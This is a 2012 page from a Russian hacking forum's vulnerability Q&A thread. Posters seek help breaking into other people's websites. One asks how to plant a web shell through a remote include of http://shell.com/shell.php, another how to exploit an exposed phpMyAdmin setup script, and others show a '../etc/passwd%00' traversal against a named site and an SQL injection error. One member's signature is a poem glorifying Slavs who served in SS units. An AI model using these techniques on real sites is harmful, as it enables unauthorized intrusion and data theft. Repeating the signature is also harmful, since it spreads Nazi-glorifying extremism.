HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2006 из 2438 « Первая < 10061506190619561996 2002 2003 2004 2005 2006 2007 2008 2009 2010 201620562106 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #20051  
Старый 15.03.2012, 02:43
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
Цитата:
Сообщение от Spunoff  
Spunoff said:
site.com/page.php=about.php выдаёт about.php на сервере
site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте
Можно как-то залить шелл на site.com?
скорее всего это просто ифрейм а не инклуд
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #20052  
Старый 15.03.2012, 04:00
Spunoff
Guest
Сообщений: n/a
Провел на форуме:
9938

Репутация: 0
По умолчанию
Теперь я знаю какой код на странице

т.е это получается инклуд всё-таки...но почему он при

site.com/page.php=http://shell.com/shell.php показывает шелл, но на моём же хосте?

Подскажите плиз как залить шелл сюда?

register_globals=Off
 
Ответить с цитированием

  #20053  
Старый 15.03.2012, 04:31
mironich
Guest
Сообщений: n/a
Провел на форуме:
142623

Репутация: 19
По умолчанию
Цитата:
Сообщение от None  
показывает шелл, но на моём же хосте?
Скорее всего потомучто выполняеться на твоем хосте?

Переименуй из php в txt и проверь.
 
Ответить с цитированием

  #20054  
Старый 15.03.2012, 05:04
Spunoff
Guest
Сообщений: n/a
Провел на форуме:
9938

Репутация: 0
По умолчанию
mironich спасибо, помогло
 
Ответить с цитированием

  #20055  
Старый 15.03.2012, 10:46
JorryGo
Guest
Сообщений: n/a
Провел на форуме:
1293

Репутация: 0
По умолчанию
Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.

Есть ли возможность получить доступ к бд или залить шелл?

Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.

Есть ли вообще известные уязвимости под эту версию?
 
Ответить с цитированием

  #20056  
Старый 15.03.2012, 12:23
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию
Цитата:
Сообщение от JorryGo  
JorryGo said:
Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.
Есть ли возможность получить доступ к бд или залить шелл?
Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.
Есть ли вообще известные уязвимости под эту версию?
https://rdot.org/forum/showpost.php?p=13736&postcount=6

при mq=off и PHP
 
Ответить с цитированием

  #20057  
Старый 15.03.2012, 12:54
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Faaax  
Faaax said:
попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
 
Ответить с цитированием

  #20058  
Старый 15.03.2012, 13:18
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
/thread98525.html
 
Ответить с цитированием

  #20059  
Старый 15.03.2012, 13:22
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Melfis  
Melfis said:
/thread98525.html
блин я же написал

Цитата:
Сообщение от None  
народ а тут, нужно отсеять окончание, нул байт не помогает
http://proeveryday.ru/index.php?id=../etc/passwd%00
тут читал /thread98525.html но нифига неполучилось, мб недопонял
подскажите как правильно
 
Ответить с цитированием

  #20060  
Старый 15.03.2012, 13:34
CheatXX
Новичок
Регистрация: 08.06.2009
Сообщений: 2
Провел на форуме:
16143

Репутация: 0
По умолчанию
подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать?

ввел например туда '1 и он ошибку вывел

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
 
Ответить с цитированием
Ответ
Страница 2006 из 2438 « Первая < 10061506190619561996 2002 2003 2004 2005 2006 2007 2008 2009 2010 201620562106 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ